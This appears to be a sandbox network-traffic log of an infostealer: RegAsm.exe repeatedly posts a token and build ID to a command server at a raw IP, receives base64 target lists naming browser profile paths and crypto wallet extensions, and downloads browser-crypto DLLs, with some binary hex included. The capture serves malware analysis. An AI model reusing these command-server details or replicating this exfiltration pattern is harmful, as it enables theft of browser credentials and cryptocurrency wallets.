                                                                              2024-05-17 16:05:58 UTC | 69 | IN | Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 30 7c 34 64 65 62 37 38 32 34 36 63 30 31 30 39 39 34 64 31 33 32 36 63 34 62 38 64 34 39 34 32 62 32 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 3a1|1|1|0|4deb78246c010994d1326c4b8d4942b2|1|1|1|0|0|50000|00


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              3 | 192.168.2.5 | 49707 | 95.217.240.101 | 443 | 1600 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-17 16:05:59 UTC | 325 | OUT | POST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----CAKKEGDGCGDAKEBFIJEC
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Content-Length: 331
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              Data Ascii: ------CAKKEGDGCGDAKEBFIJECContent-Disposition: form-data; name="token"4deb78246c010994d1326c4b8d4942b2------CAKKEGDGCGDAKEBFIJECContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------CAKKEGDGCGDAKEBFIJECCont
                                                                              2024-05-17 16:06:01 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:00 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              4 | 192.168.2.5 | 49708 | 95.217.240.101 | 443 | 1600 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-17 16:06:02 UTC | 325 | OUT | POST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----CFIECBFIDGDAKFHIEHJK
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Content-Length: 331
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              Data Ascii: ------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="token"4deb78246c010994d1326c4b8d4942b2------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------CFIECBFIDGDAKFHIEHJKCont
                                                                              2024-05-17 16:06:04 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:03 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Ascii: 15d8TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              5 | 192.168.2.5 | 49709 | 95.217.240.101 | 443 | 1600 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-17 16:06:05 UTC | 325 | OUT | POST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----IDBAKKECAEGCAKFIIIDH
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Content-Length: 332
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              Data Ascii: ------IDBAKKECAEGCAKFIIIDHContent-Disposition: form-data; name="token"4deb78246c010994d1326c4b8d4942b2------IDBAKKECAEGCAKFIIIDHContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------IDBAKKECAEGCAKFIIIDHCont
                                                                              2024-05-17 16:06:07 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:06 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              6 | 192.168.2.5 | 49710 | 95.217.240.101 | 443 | 1600 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-17 16:06:08 UTC | 326 | OUT | POST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----HDBGHDHCGHCAAKEBKECB
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Content-Length: 5713
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              Data Ascii: ------HDBGHDHCGHCAAKEBKECBContent-Disposition: form-data; name="token"4deb78246c010994d1326c4b8d4942b2------HDBGHDHCGHCAAKEBKECBContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------HDBGHDHCGHCAAKEBKECBCont
                                                                              2024-05-17 16:06:10 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:09 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-17 16:06:10 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 2ok0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              7 | 192.168.2.5 | 49712 | 95.217.240.101 | 443 | 1600 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-17 16:06:09 UTC | 241 | OUT | GET /sqlx.dll HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:06:11 UTC | 248 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:10 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 2459136
                                                                              Last-Modified: Sun, 12 May 2024 18:14:05 GMT
                                                                              Connection: close
                                                                              ETag: "664106ed-258600"
                                                                              Accept-Ranges: bytes


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              8 | 192.168.2.5 | 49716 | 95.217.240.101 | 443 | 1600 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-17 16:06:14 UTC | 325 | OUT | POST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----KFBFCAFCBKFIEBFHIDBA
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Content-Length: 829
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:06:14 UTC | 829 | OUT | Data Ascii: ------KFBFCAFCBKFIEBFHIDBAContent-Disposition: form-data; name="token"4deb78246c010994d1326c4b8d4942b2------KFBFCAFCBKFIEBFHIDBAContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------KFBFCAFCBKFIEBFHIDBACont
                                                                              2024-05-17 16:06:15 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:15 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-17 16:06:15 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 2ok0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              9 | 192.168.2.5 | 49718 | 95.217.240.101 | 443 | 1600 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-17 16:06:14 UTC | 325 | OUT | POST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----BKJJJDHDGDAAKECAKJDA
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Content-Length: 437
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:06:14 UTC | 437 | OUT | Data Ascii: ------BKJJJDHDGDAAKECAKJDAContent-Disposition: form-data; name="token"4deb78246c010994d1326c4b8d4942b2------BKJJJDHDGDAAKECAKJDAContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------BKJJJDHDGDAAKECAKJDACont
                                                                              2024-05-17 16:06:16 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:15 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-17 16:06:16 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 2ok0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              10 | 192.168.2.5 | 49719 | 95.217.240.101 | 443 | 1600 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-17 16:06:17 UTC | 325 | OUT | POST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----HDBGHDHCGHCAAKEBKECB
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Content-Length: 437
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:06:17 UTC | 437 | OUT | Data Ascii: ------HDBGHDHCGHCAAKEBKECBContent-Disposition: form-data; name="token"4deb78246c010994d1326c4b8d4942b2------HDBGHDHCGHCAAKEBKECBContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------HDBGHDHCGHCAAKEBKECBCont
                                                                              2024-05-17 16:06:18 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:18 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-17 16:06:18 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 2ok0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              11 | 192.168.2.5 | 49720 | 95.217.240.101 | 443 | 1600 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-17 16:06:18 UTC | 220 | OUT | GET /freebl3.dll HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:06:19 UTC | 246 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:18 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 685392
                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                              Connection: close
                                                                              ETag: "6315a9f4-a7550"
                                                                              Accept-Ranges: bytes


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              12 | 192.168.2.5 | 49721 | 95.217.240.101 | 443 | 1600 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-17 16:06:21 UTC | 220 | OUT | GET /mozglue.dll HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:06:22 UTC | 246 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:22 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 608080
                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                              Connection: close
                                                                              ETag: "6315a9f4-94750"
                                                                              Accept-Ranges: bytes


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
13  192.168.2.5  49722  95.217.240.101  443  1600  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp  Bytes transferred  Direction  Data
2024-05-17 16:06:26 UTC  221  OUT  GET /msvcp140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
Host: 95.217.240.101
Cache-Control: no-cache
2024-05-17 16:06:27 UTC  246  IN  HTTP/1.1 200 OK
Server: nginx
Date: Fri, 17 May 2024 16:06:27 GMT
Content-Type: application/octet-stream
Content-Length: 450024
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-6dde8"
Accept-Ranges: bytes


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
14  192.168.2.5  49723  95.217.240.101  443  1600  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp  Bytes transferred  Direction  Data
2024-05-17 16:06:30 UTC  217  OUT  GET /nss3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
Host: 95.217.240.101
Cache-Control: no-cache
2024-05-17 16:06:30 UTC  248  IN  HTTP/1.1 200 OK
Server: nginx
Date: Fri, 17 May 2024 16:06:30 GMT
Content-Type: application/octet-stream
Content-Length: 2046288
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-1f3950"
Accept-Ranges: bytes


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
15  192.168.2.5  49724  95.217.240.101  443  1600  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp  Bytes transferred  Direction  Data
2024-05-17 16:06:34 UTC  221  OUT  GET /softokn3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
Host: 95.217.240.101
Cache-Control: no-cache
2024-05-17 16:06:35 UTC  246  IN  HTTP/1.1 200 OK
Server: nginx
Date: Fri, 17 May 2024 16:06:34 GMT
Content-Type: application/octet-stream
Content-Length: 257872
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-3ef50"
Accept-Ranges: bytes
                                                                              2024-05-17 16:06:35 UTC16384INData Raw: d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 04 56 e8 78 4d 01 00 83 c4 04 83 fb 40 bf
                                                                              Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZVxM@
                                                                              2024-05-17 16:06:35 UTC16384INData Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73
                                                                              Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
                                                                              2024-05-17 16:06:35 UTC16384INData Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00
                                                                              Data Ascii: USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4|~
                                                                              2024-05-17 16:06:35 UTC16384INData Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff
                                                                              Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              16 | 192.168.2.5 | 49725 | 95.217.240.101 | 443 | 1600 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-17 16:06:37 UTC | 225 | OUT | GET /vcruntime140.dll HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:06:38 UTC | 245 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:37 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 80880
                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                              Connection: close
                                                                              ETag: "6315a9f4-13bf0"
                                                                              Accept-Ranges: bytes


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              17 | 192.168.2.5 | 49726 | 95.217.240.101 | 443 | 1600 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-17 16:06:40 UTC | 326 | OUT | POST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----KFIDAFBFBKFHJJKEHIEG
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Content-Length: 1145
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:06:40 UTC | 1145 | OUT | Data Ascii:
                                                                              ------KFIDAFBFBKFHJJKEHIEG
                                                                              Content-Disposition: form-data; name="token"

                                                                              4deb78246c010994d1326c4b8d4942b2
                                                                              ------KFIDAFBFBKFHJJKEHIEG
                                                                              Content-Disposition: form-data; name="build_id"

                                                                              9ed287469c3721fd5caf346580b2cf0d
                                                                              ------KFIDAFBFBKFHJJKEHIEG
                                                                              Cont
                                                                              2024-05-17 16:06:42 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:41 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-17 16:06:42 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 2ok0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              18 | 192.168.2.5 | 49727 | 95.217.240.101 | 443 | 1600 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-17 16:06:42 UTC | 325 | OUT | POST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----GCGDGHCBGDHJJKECAECB
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Content-Length: 331
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:06:42 UTC | 331 | OUT | Data Ascii:
                                                                              ------GCGDGHCBGDHJJKECAECB
                                                                              Content-Disposition: form-data; name="token"

                                                                              4deb78246c010994d1326c4b8d4942b2
                                                                              ------GCGDGHCBGDHJJKECAECB
                                                                              Content-Disposition: form-data; name="build_id"

                                                                              9ed287469c3721fd5caf346580b2cf0d
                                                                              ------GCGDGHCBGDHJJKECAECB
                                                                              Cont
                                                                              2024-05-17 16:06:43 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:42 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              19 | 192.168.2.5 | 49728 | 95.217.240.101 | 443 | 1600 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-17 16:06:44 UTC | 325 | OUT | POST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----AFCAAEGDBKJJKECBKFHC
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Content-Length: 331
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:06:44 UTC | 331 | OUT | Data Ascii:
                                                                              ------AFCAAEGDBKJJKECBKFHC
                                                                              Content-Disposition: form-data; name="token"

                                                                              4deb78246c010994d1326c4b8d4942b2
                                                                              ------AFCAAEGDBKJJKECBKFHC
                                                                              Content-Disposition: form-data; name="build_id"

                                                                              9ed287469c3721fd5caf346580b2cf0d
                                                                              ------AFCAAEGDBKJJKECBKFHC
                                                                              Cont
                                                                              2024-05-17 16:06:45 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:45 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              20 | 192.168.2.5 | 49729 | 95.217.240.101 | 443 | 1600 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-17 16:06:47 UTC | 325 | OUT | POST / HTTP/1.1
